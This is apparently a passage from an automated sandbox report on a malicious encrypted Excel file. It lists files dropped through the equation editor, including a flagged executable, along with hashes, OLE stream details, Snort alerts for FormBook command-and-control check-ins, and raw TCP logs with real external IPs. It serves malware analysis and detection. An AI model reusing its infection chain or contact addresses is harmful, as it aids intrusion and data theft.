                                  SHA-256:E7B744F45621B40AC44F270A9D714312170762CA4A7DAF2BA78D5071300EF454
                                  SHA-512:F2431F3345AAB82CFCE2F96E1D54E53539964726F2E0DBC1724A836AD6281493291156AAD7CA263B829E4A1210A118E6FA791F198B869B4741CB47047A5E6D6A
                                  Malicious:false
                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\73F51C02.png
                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                  File Type:PNG image data, 1686 x 725, 8-bit/color RGBA, non-interlaced
                                  Category:dropped
                                  Size (bytes):79394
                                  Entropy (8bit):7.864111100215953
                                  Encrypted:false
                                  SSDEEP:1536:ACLfq2zNFewyOGGG0QZ+6G0GGGLvjpP7OGGGeLEnf85dUGkm6COLZgf3BNUdQ:7PzbewyOGGGv+6G0GGG7jpP7OGGGeLEe
                                  MD5:16925690E9B366EA60B610F517789AF1
                                  SHA1:9F3FE15AE44644F9ED8C2CA668B7020DF726426B
                                  SHA-256:C3D7308B11E8C1EFD9C0A7F6EC370A13EC2C87123811865ED372435784579C1F
                                  SHA-512:AEF16EA5F33602233D60F6B6861980488FD252F14DCAE10A9A328338A6890B081D59DCBD9F5B68E93D394DEF2E71AD06937CE2711290E7DD410451A3B1E54CDD
                                  Malicious:false
                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\82A523E1.png
                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                  File Type:PNG image data, 566 x 429, 8-bit/color RGBA, non-interlaced
                                  Category:dropped
                                  Size (bytes):84203
                                  Entropy (8bit):7.979766688932294
                                  Encrypted:false
                                  SSDEEP:1536:RrpoeM3WUHO25A8HD3So4lL9jvtO63O2l/Wr9nuQvs+9QvM4PmgZuVHdJ5v3ZK7+:H5YHOhwx4lRTtO6349uQvXJ4PmgZu11J
                                  MD5:208FD40D2F72D9AED77A86A44782E9E2
                                  SHA1:216B99E777ED782BDC3BFD1075DB90DFDDABD20F
                                  SHA-256:CBFDB963E074C150190C93796163F3889165BF4471CA77C39E756CF3F6F703FF
                                  SHA-512:7BCE80FFA8B0707E4598639023876286B6371AE465A9365FA21D2C01405AB090517C448514880713CA22875013074DB9D5ED8DA93C223F265C179CFADA609A64
                                  Malicious:false
                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\84A44456.png
                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                  File Type:PNG image data, 476 x 244, 8-bit/color RGB, non-interlaced
                                  Category:dropped
                                  Size (bytes):49744
                                  Entropy (8bit):7.99056926749243
                                  Encrypted:true
                                  SSDEEP:768:wnuJ6p14x3egT1LYye1wBiPaaBsZbkCev17dGOhRkJjsv+gZB/UcVaxZJ2LEz:Yfp1UeWNYF1UiPm+/q1sxZB/ZS
                                  MD5:63A6CB15B2B8ECD64F1158F5C8FBDCC8
                                  SHA1:8783B949B93383C2A5AF7369C6EEB9D5DD7A56F6
                                  SHA-256:AEA49B54BA0E46F19E04BB883DA311518AF3711132E39D3AF143833920CDD232
                                  SHA-512:BB42A40E6EADF558C2AAE82F5FB60B8D3AC06E669F41B46FCBE65028F02B2E63491DB40E1C6F1B21A830E72EE52586B83A24A055A06C2CCC2D1207C2D5AD6B45
                                  Malicious:false
                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\9EFF6EAC.png
                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                  File Type:PNG image data, 1686 x 725, 8-bit/color RGBA, non-interlaced
                                  Category:dropped
                                  Size (bytes):79394
                                  Entropy (8bit):7.864111100215953
                                  Encrypted:false
                                  SSDEEP:1536:ACLfq2zNFewyOGGG0QZ+6G0GGGLvjpP7OGGGeLEnf85dUGkm6COLZgf3BNUdQ:7PzbewyOGGGv+6G0GGG7jpP7OGGGeLEe
                                  MD5:16925690E9B366EA60B610F517789AF1
                                  SHA1:9F3FE15AE44644F9ED8C2CA668B7020DF726426B
                                  SHA-256:C3D7308B11E8C1EFD9C0A7F6EC370A13EC2C87123811865ED372435784579C1F
                                  SHA-512:AEF16EA5F33602233D60F6B6861980488FD252F14DCAE10A9A328338A6890B081D59DCBD9F5B68E93D394DEF2E71AD06937CE2711290E7DD410451A3B1E54CDD
                                  Malicious:false
                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\A7DD26BD.png
                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                  File Type:PNG image data, 1268 x 540, 8-bit/color RGBA, non-interlaced
                                  Category:dropped
                                  Size (bytes):51166
                                  Entropy (8bit):7.767050944061069
                                  Encrypted:false
                                  SSDEEP:1536:zdKgAwKoL5H8LiLtoEdJ9OSbB7laAvRXDlBig49A:JDAQ9H8/GMSdhahg49A
                                  MD5:8C29CF033A1357A8DE6BF1FC4D0B2354
                                  SHA1:85B228BBC80DC60D40F4D3473E10B742E7B9039E
                                  SHA-256:E7B744F45621B40AC44F270A9D714312170762CA4A7DAF2BA78D5071300EF454
                                  SHA-512:F2431F3345AAB82CFCE2F96E1D54E53539964726F2E0DBC1724A836AD6281493291156AAD7CA263B829E4A1210A118E6FA791F198B869B4741CB47047A5E6D6A
                                  Malicious:false
                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\A83AF197.jpeg
                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                  File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 191x263, frames 3
                                  Category:dropped
                                  Size (bytes):8815
                                  Entropy (8bit):7.944898651451431
                                  Encrypted:false
                                  SSDEEP:192:Qjnr2Il8e7li2YRD5x5dlyuaQ0ugZIBn+0O2yHQGYtPto:QZl8e7li2YdRyuZ0b+JGgtPW
                                  MD5:F06432656347B7042C803FE58F4043E1
                                  SHA1:4BD52B10B24EADECA4B227969170C1D06626A639
                                  SHA-256:409F06FC20F252C724072A88626CB29F299167EAE6655D81DF8E9084E62D6CF6
                                  SHA-512:358FEB8CBFFBE6329F31959F0F03C079CF95B494D3C76CF3669D28CA8CDB42B04307AE46CED1FC0605DEF31D9839A0283B43AA5D409ADC283A1CAD787BE95F0E
                                  Malicious:false
                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\AA45CD69.emf
                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                  File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                  Category:dropped
                                  Size (bytes):7608
                                  Entropy (8bit):5.091127811854214
                                  Encrypted:false
                                  SSDEEP:96:+SDjyLSR5gs3iwiMO10VCVU7ckQadVDYM/PVfmhDqpH:5Djr+sW31RGtdVDYM3VfmkpH
                                  MD5:EB06F07412A815AED391F20298C1087B
                                  SHA1:AC0601FFC173F50B56C3AE2265C61B76711FBE01
                                  SHA-256:5CA81C391E8CA113254221D535BE4E0677908DA61DE0016EC963DD443F535FDE
                                  SHA-512:38AEF603FAC0AB6FB7159EBA5B48BD7E191A433739710AEACB11538E51ADA5E99CD724BE5B3886986FCBB02375B0C132B0C303AE8838602BCE88475DDD727A49
                                  Malicious:false
                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\DBF7BC5F.png
                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                  File Type:PNG image data, 566 x 429, 8-bit/color RGBA, non-interlaced
                                  Category:dropped
                                  Size (bytes):84203
                                  Entropy (8bit):7.979766688932294
                                  Encrypted:false
                                  SSDEEP:1536:RrpoeM3WUHO25A8HD3So4lL9jvtO63O2l/Wr9nuQvs+9QvM4PmgZuVHdJ5v3ZK7+:H5YHOhwx4lRTtO6349uQvXJ4PmgZu11J
                                  MD5:208FD40D2F72D9AED77A86A44782E9E2
                                  SHA1:216B99E777ED782BDC3BFD1075DB90DFDDABD20F
                                  SHA-256:CBFDB963E074C150190C93796163F3889165BF4471CA77C39E756CF3F6F703FF
                                  SHA-512:7BCE80FFA8B0707E4598639023876286B6371AE465A9365FA21D2C01405AB090517C448514880713CA22875013074DB9D5ED8DA93C223F265C179CFADA609A64
                                  Malicious:false
                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\EFA7786E.png
                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                  File Type:PNG image data, 399 x 605, 8-bit/color RGBA, non-interlaced
                                  Category:dropped
                                  Size (bytes):50311
                                  Entropy (8bit):7.960958863022709
                                  Encrypted:false
                                  SSDEEP:768:hfo72tRlBZeeRugjj8yooVAK92SYAD0PSsX35SVFN0t3HcoNz8WEK6Hm8bbxXVGx:hf0WBueSoVAKxLD06w35SEVNz8im0AEH
                                  MD5:4141C7515CE64FED13BE6D2BA33299AA
                                  SHA1:B290F533537A734B7030CE1269AC8C5398754194
                                  SHA-256:F6B0FE628E1469769E6BD3660611B078CEF6EE396F693361B1B42A9100973B75
                                  SHA-512:74E9927BF0C6F8CB9C3973FD68DAD12B422DC4358D5CCED956BC6A20139B21D929E47165F77D208698924CB7950A7D5132953C75770E4A357580BF271BD9BD88
                                  Malicious:false
                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F152D108.emf
                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                  File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                  Category:dropped
                                  Size (bytes):648132
                                  Entropy (8bit):2.8124530118203914
                                  Encrypted:false
                                  SSDEEP:3072:134UL0tS6WB0JOqFB5AEA7rgXuzqr8nG/qc+L+:l4UcLe0JOcXuurhqcJ
                                  MD5:955A9E08DFD3A0E31C7BCF66F9519FFC
                                  SHA1:F677467423105ACF39B76CB366F08152527052B3
                                  SHA-256:08A70584E1492DA4EC8557567B12F3EA3C375DAD72EC15226CAFB857527E86A5
                                  SHA-512:39A2A0C062DEB58768083A946B8BCE0E46FDB2F9DDFB487FE9C544792E50FEBB45CEEE37627AA0B6FEC1053AB48841219E12B7E4B97C51F6A4FD308B52555688
                                  Malicious:false
                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F1699B60.png
                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                  File Type:PNG image data, 476 x 244, 8-bit/color RGB, non-interlaced
                                  Category:dropped
                                  Size (bytes):49744
                                  Entropy (8bit):7.99056926749243
                                  Encrypted:true
                                  SSDEEP:768:wnuJ6p14x3egT1LYye1wBiPaaBsZbkCev17dGOhRkJjsv+gZB/UcVaxZJ2LEz:Yfp1UeWNYF1UiPm+/q1sxZB/ZS
                                  MD5:63A6CB15B2B8ECD64F1158F5C8FBDCC8
                                  SHA1:8783B949B93383C2A5AF7369C6EEB9D5DD7A56F6
                                  SHA-256:AEA49B54BA0E46F19E04BB883DA311518AF3711132E39D3AF143833920CDD232
                                  SHA-512:BB42A40E6EADF558C2AAE82F5FB60B8D3AC06E669F41B46FCBE65028F02B2E63491DB40E1C6F1B21A830E72EE52586B83A24A055A06C2CCC2D1207C2D5AD6B45
                                  Malicious:false
                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\FC1EE4C5.jpeg
                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                  File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 191x263, frames 3
                                  Category:dropped
                                  Size (bytes):8815
                                  Entropy (8bit):7.944898651451431
                                  Encrypted:false
                                  SSDEEP:192:Qjnr2Il8e7li2YRD5x5dlyuaQ0ugZIBn+0O2yHQGYtPto:QZl8e7li2YdRyuZ0b+JGgtPW
                                  MD5:F06432656347B7042C803FE58F4043E1
                                  SHA1:4BD52B10B24EADECA4B227969170C1D06626A639
                                  SHA-256:409F06FC20F252C724072A88626CB29F299167EAE6655D81DF8E9084E62D6CF6
                                  SHA-512:358FEB8CBFFBE6329F31959F0F03C079CF95B494D3C76CF3669D28CA8CDB42B04307AE46CED1FC0605DEF31D9839A0283B43AA5D409ADC283A1CAD787BE95F0E
                                  Malicious:false
                                  C:\Users\user\Desktop\~$Letter 1019.xlsx
                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):330
                                  Entropy (8bit):1.4377382811115937
                                  Encrypted:false
                                  SSDEEP:3:vZ/FFDJw2fj/FFDJw2fV:vBFFGaFFGS
                                  MD5:96114D75E30EBD26B572C1FC83D1D02E
                                  SHA1:A44EEBDA5EB09862AC46346227F06F8CFAF19407
                                  SHA-256:0C6F8CF0E504C17073E4C614C8A7063F194E335D840611EEFA9E29C7CED1A523
                                  SHA-512:52D33C36DF2A91E63A9B1949FDC5D69E6A3610CD3855A2E3FC25017BF0A12717FC15EB8AC6113DC7D69C06AD4A83FAF0F021AD7C8D30600AA8168348BD0FA9E0
                                  Malicious:true
                                  Preview: .user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                  C:\Users\Public\vbc.exe
                                  Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                  Category:dropped
                                  Size (bytes):993792
                                  Entropy (8bit):7.859694041798628
                                  Encrypted:false
                                  SSDEEP:24576:vo2y0RBSy/DrDoqbg1L+8XAaIXqziNeBUdt:vXNzrrDoeg1qYBIOiwBU
                                  MD5:15D907E7D9F8286E5053796C9D78FCEC
                                  SHA1:B7D7329E94E2292ED53E2778CEBEC533AC599030
                                  SHA-256:771E4F69520F71AFE6A6E9A4EB4DE7DCD8D7521D90DB290CA6C27B1A95C532AF
                                  SHA-512:C11D01A61F3DAB5923CC7C2A64EAE2732B5633376D3EF3F9FDF6A0E59567226ECA74B84E4CAD49DA87F6538B6C42C7F7A98A552C12E7B0917E6FF5F81D09F02E
                                  Malicious:true
                                  Antivirus:
                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                  • Antivirus: ReversingLabs, Detection: 15%
                                  Joe Sandbox View:
                                  • Filename: Letter 09JUN 2021.xlsx, Detection: malicious, Browse

                                  Static File Info

                                  General

                                  File type:CDFV2 Encrypted
                                  Entropy (8bit):7.995656685932539
                                  TrID:
                                  • Generic OLE2 / Multistream Compound File (8008/1) 100.00%
                                  File name:Letter 1019.xlsx
                                  File size:1297920
                                  MD5:e781a9517fe291b2c42878ac9c68d70c
                                  SHA1:01e1b2d2df156dfe65bca40f264c71bcee9fa592
                                  SHA256:2d4f498ee8c41344e6bab8d1d638d48a62672c5cb6ee67afdd5e3333d892715e
                                  SHA512:7cd525b24a81266760957dce9c2785450996127f725e51025157e84690f6e3fc740619c59023ebf6155712a0cf1ebdf3c18d44301aa9d06ccd2a2bcb353a57c8
                                  SSDEEP:24576:xhd1FE2xOPmTXXt2JvlMYWZWh4RBJyGpEh1TSeoyI8yfTaVP8OoFhcjBc:xhZEKOuDX8nRHh4RB03G8ETOPic+

                                  File Icon

                                  Icon Hash:e4e2aa8aa4b4bcb4

                                  Static OLE Info

                                  General

                                  Document Type:OLE
                                  Number of OLE Files:1

                                  OLE File "Letter 1019.xlsx"

                                  Indicators

                                  Has Summary Info:False
                                  Application Name:unknown
                                  Encrypted Document:True
                                  Contains Word Document Stream:False
                                  Contains Workbook/Book Stream:False
                                  Contains PowerPoint Document Stream:False
                                  Contains Visio Document Stream:False
                                  Contains ObjectPool Stream:
                                  Flash Objects Count:
                                  Contains VBA Macros:False

                                  Streams

                                  Stream Path: \x6DataSpaces/DataSpaceInfo/StrongEncryptionDataSpace, File Type: data, Stream Size: 64
                                  General
                                  Stream Path:\x6DataSpaces/DataSpaceInfo/StrongEncryptionDataSpace
                                  File Type:data
                                  Stream Size:64
                                  Entropy:2.73637206947
                                  Base64 Encoded:False
                                  Data ASCII:. . . . . . . . 2 . . . S . t . r . o . n . g . E . n . c . r . y . p . t . i . o . n . T . r . a . n . s . f . o . r . m . . .
                                  Stream Path: \x6DataSpaces/DataSpaceMap, File Type: data, Stream Size: 112
                                  General
                                  Stream Path:\x6DataSpaces/DataSpaceMap
                                  File Type:data
                                  Stream Size:112
                                  Entropy:2.7597816111
                                  Base64 Encoded:False
                                  Data ASCII:. . . . . . . . h . . . . . . . . . . . . . . E . n . c . r . y . p . t . e . d . P . a . c . k . a . g . e . 2 . . . S . t . r . o . n . g . E . n . c . r . y . p . t . i . o . n . D . a . t . a . S . p . a . c . e . . .
                                  Stream Path: \x6DataSpaces/TransformInfo/StrongEncryptionTransform/\x6Primary, File Type: data, Stream Size: 200
                                  General
                                  Stream Path:\x6DataSpaces/TransformInfo/StrongEncryptionTransform/\x6Primary
                                  File Type:data
                                  Stream Size:200
                                  Entropy:3.13335930328
                                  Base64 Encoded:False
                                  Data ASCII:X . . . . . . . L . . . { . F . F . 9 . A . 3 . F . 0 . 3 . - . 5 . 6 . E . F . - . 4 . 6 . 1 . 3 . - . B . D . D . 5 . - . 5 . A . 4 . 1 . C . 1 . D . 0 . 7 . 2 . 4 . 6 . } . N . . . M . i . c . r . o . s . o . f . t . . . C . o . n . t . a . i . n . e . r . . . E . n . c . r . y . p . t . i . o . n . T . r . a . n . s . f . o . r . m . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                  Stream Path: \x6DataSpaces/Version, File Type: data, Stream Size: 76
                                  General
                                  Stream Path:\x6DataSpaces/Version
                                  File Type:data
                                  Stream Size:76
                                  Entropy:2.79079600998
                                  Base64 Encoded:False
                                  Data ASCII:< . . . M . i . c . r . o . s . o . f . t . . . C . o . n . t . a . i . n . e . r . . . D . a . t . a . S . p . a . c . e . s . . . . . . . . . . . . .
                                  Stream Path: EncryptedPackage, File Type: data, Stream Size: 1283656
                                  General
                                  Stream Path:EncryptedPackage
                                  File Type:data
                                  Stream Size:1283656
                                  Entropy:7.99984183654
                                  Base64 Encoded:True
                                  Stream Path: EncryptionInfo, File Type: data, Stream Size: 224
                                  General
                                  Stream Path:EncryptionInfo
                                  File Type:data
                                  Stream Size:224
                                  Entropy:4.51925233254
                                  Base64 Encoded:False
                                  Data ASCII:. . . . $ . . . . . . . $ . . . . . . . . f . . . . . . . . . . . . . . . . . . . . . . M . i . c . r . o . s . o . f . t . . E . n . h . a . n . c . e . d . . R . S . A . . a . n . d . . A . E . S . . C . r . y . p . t . o . g . r . a . p . h . i . c . . P . r . o . v . i . d . e . r . . . . . . . . g . . . . . M . . . . . ~ F 7 P . . . . . g . . . v . . . / . . . . . e . . . F ~ < . . . . e . . . . . ` Y . . . 8 | 5 . . . . . . .

                                  Network Behavior

                                  Snort IDS Alerts

                                  Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
                                  06/10/21-15:24:50.574428 | TCP | 2022550 | ET TROJAN Possible Malicious Macro DL EXE Feb 2016 | 49165 | 80 | 192.168.2.22 | 18.140.1.169
                                  06/10/21-15:26:08.719492 | TCP | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49166 | 80 | 192.168.2.22 | 172.67.161.4
                                  06/10/21-15:26:08.719492 | TCP | 2031449 | ET TROJAN FormBook CnC Checkin (GET) | 49166 | 80 | 192.168.2.22 | 172.67.161.4
                                  06/10/21-15:26:08.719492 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49166 | 80 | 192.168.2.22 | 172.67.161.4
                                  06/10/21-15:26:27.789880 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49168 | 99.83.154.118 | 192.168.2.22

                                  Network Port Distribution

                                  TCP Packets

                                  Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                  Jun 10, 2021 15:24:50.946770906 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:50.946779966 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:50.946793079 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:50.946794987 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:50.946814060 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:50.946822882 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:50.946846962 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:50.949217081 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:51.132210970 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:51.132253885 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:51.132280111 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:51.132304907 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:51.132327080 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:51.132350922 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:51.132375002 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:51.132404089 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:51.132410049 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:51.132430077 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:51.132440090 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:51.132442951 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:51.132453918 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:51.132462978 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:51.132478952 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:51.132487059 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:51.132502079 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:51.132508039 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:51.132525921 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:51.132535934 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:51.132550001 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:51.132565975 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:51.132580042 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:51.132591009 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:51.132606983 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:51.132606983 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:51.132632017 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:51.132638931 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:51.132652998 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:51.132662058 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:51.132677078 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:51.132685900 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:51.132699966 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:51.132709026 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:51.132724047 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:51.132733107 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:51.132745981 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:51.132756948 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:51.132766962 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:51.132781029 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:51.132791996 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:51.132813931 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:51.132817030 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:51.132824898 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:51.132839918 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:51.132848024 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:51.132865906 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:51.132870913 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:51.132893085 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:51.132905960 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:51.132924080 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:51.132932901 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:51.132949114 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:51.132958889 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:51.132972956 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:51.132980108 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:51.132998943 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:51.133002996 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:51.133023977 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:51.133032084 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:51.133049011 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:51.133054972 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:51.133074045 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:51.133081913 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:51.133097887 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:51.133105040 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:51.133130074 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:51.134064913 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:51.134104013 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:51.134131908 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:51.134155989 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:51.134159088 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:51.134181023 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:51.134185076 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:51.135543108 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:51.319240093 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:51.319281101 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:51.319305897 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:51.319328070 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:51.319351912 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:51.319375038 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:51.319400072 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:51.319416046 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:51.319422960 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:51.319444895 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:51.319448948 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:51.319448948 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:51.319452047 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:51.319472075 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:51.319477081 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:51.319494963 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:51.319502115 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:51.319516897 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:51.319525003 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:51.319540024 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:51.319549084 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:51.319562912 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:51.319571018 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:51.319586039 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:51.319591045 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:51.319607973 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:51.319616079 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:51.319637060 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:51.320354939 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:51.320389032 CEST804916518.140.1.169192.168.2.22
